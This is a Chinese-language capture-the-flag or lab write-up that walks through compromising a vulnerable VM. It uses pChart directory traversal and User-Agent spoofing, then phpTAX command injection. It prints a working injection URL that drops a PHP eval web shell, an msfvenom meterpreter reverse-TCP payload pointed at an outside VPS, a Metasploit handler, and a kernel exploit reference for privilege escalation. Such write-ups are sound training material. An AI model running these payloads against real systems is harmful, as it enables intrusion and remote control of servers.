环境配置

虚拟机网络适配器删了重新上一个就行

信息收集

漏洞发现

两个端口的web页面都没有显著的特征,尝试扫描路径,也没有扫到有价值的信息
8080端口访问被拒绝
在80端口的web页面源码中发现信息

访问

注意到title是pChart

尝试利用

可以知道有目录穿越和xss
我们可以尝试去读取apache的配置文件


这时可以知道只有UA相同才能访问
那么改UA再访问

用UA Switcher来伪造UA

这是一个phpTAX searchsploit搜一手

试试反弹个shell
用了nc bash php python等方法反弹均失败
那么试试执行id > 1.txt
可以在1.txt中读到命令执行内容

写个一句话
http://192.168.45.139:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php eval($_REQUEST[1]);?>" > shell.php;&pdf=make
然后蚁键连上拿虚拟终端

尝试用msf生成稳点的shell
msfvenom -p php/meterpreter/reverse_tcp lhost=vps地址 lport=9000
将生成的内容写入a.php

chmod +x a.php```
然后msf打开

```bash
use exploits/multi/handler
use payload php/meterpreter/reverse_tcp
run

php a.php 提示nosocket
那直接访问a.php呢
也是no socket

尝试使用kali自带的shell,存放在/usr/share/webshell/php/php-reverse-shell.php

再访问a.php
成功拿到稳定的shell

提权

下载LinEnum.sh枚举脆弱性

尝试内核提权


用26368.c